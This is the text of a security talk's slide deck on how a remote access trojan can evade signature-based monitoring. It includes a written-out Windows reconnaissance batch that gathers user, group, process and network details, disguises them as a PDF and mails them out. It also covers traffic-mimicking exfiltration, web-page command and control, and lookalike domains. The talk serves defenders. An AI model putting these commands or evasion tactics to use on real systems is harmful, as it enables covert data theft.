Hiding in Plain Sight
Rob Gillen@argodev
This work is licensed under a Creative Commons Attribution 3.0 License.
Disclaimer
The content of this presentation represents my personal views and thoughts at the present time. This content is not endorsed by, or representative in any way of my employer nor is it intended to be a view into my work or a reflection on the type of work that I or my group performs. It is simply a hobby and personal interest and should be considered as such.
HTDCS
Helpdesk Ticket Driven Cyber Security
CHALLENGES OF SIGNATURE TOOLSDemonstration
Network Overview
Attack Pattern
Attack Pattern
Attack Pattern
Attack Pattern
Client Compromise (Simple)
Client Compromise (Encoded & SSL)
Overview
• RAT Design• Encryption• Command/Control (C2)• AntiVirus• Behavior
RAT Design
• Exe is dropped via infected page
• Queries web page for commands• Performs commands if not done previously
• Periodically polls for new commands
Encryption
• Complex Encryption is trivial• PBKDF – Scrypt sequential memory-hard function
• Many iterations (> 10K)• Long key-lengths
Encryption Example
• Above configuration is custom-hardware resistant– Takes approximately ¼ second per guess
Command/Control
• Use Web2C Approach– Commands are “issued” en masse via normal, benign looking web pages
– Common ports– Leverages existing HTML/server constructs
Command Text
ipconfig /all > %APPDATA%\info.txtnet start >> %APPDATA%\info.txttasklist /v >> %APPDATA%\info.txtnet user >> %APPDATA%\info.txtnet localgroup administrators >> %APPDATA%\info.txtnetstat -ano >> %APPDATA%\info.txtnet use >> %APPDATA%\info.txtcopy %APPDATA%\info.txt %APPDATA%\output.pdfdel %APPDATA%\info.txt
sendmail %APPDATA%\output.pdf Status Update “Jones, William E. [email protected]” [email protected] smtp.yourorg.gov
del %APPDATA%\output.pdf
Mimic User Behavior
• Traffic Rates– Monitor incoming/outgoing network traffic for X days
– Configure xfil to stay within X% of “normal”
• C2– Exponential/randomized stand-down– Only comm during periods of activity
Mimic User Behavior
• Target URLs– Monitor outgoing web queries/URLs for X days
– Use similar domain names for malicious traffic
– Append similar/same query strings to malicious requests
Hiding in Logs
v-client-5b.sjc.dropbox.comsnt-re3-9a.sjc.dropbox.comyn-in-f125.1e100.netl1.ycs.vip.dcb.yahoo.comsnt-re3-9a.sjc.drpbox.comip-69-31-29-228.nlayer.neta23-47-20-211.deploy.static.akamaitechnologies.coml3.ycs.vip.dcb.yahoo.comir2.fp.vip.bf1.yahoo.comwww.nbcnews.com.edgesuite.netwac.946A.edgecastcdn.neta2.twimg.com
Other Hiding Techniques
• Office File content embedding• Creative location
Next Steps
• Know what you can and can’t see• Consider implications of your monitoring strategy
• Behavior *must* play a role
Questions/Contact
Rob [email protected]://rob.gillenfamily.net @argodev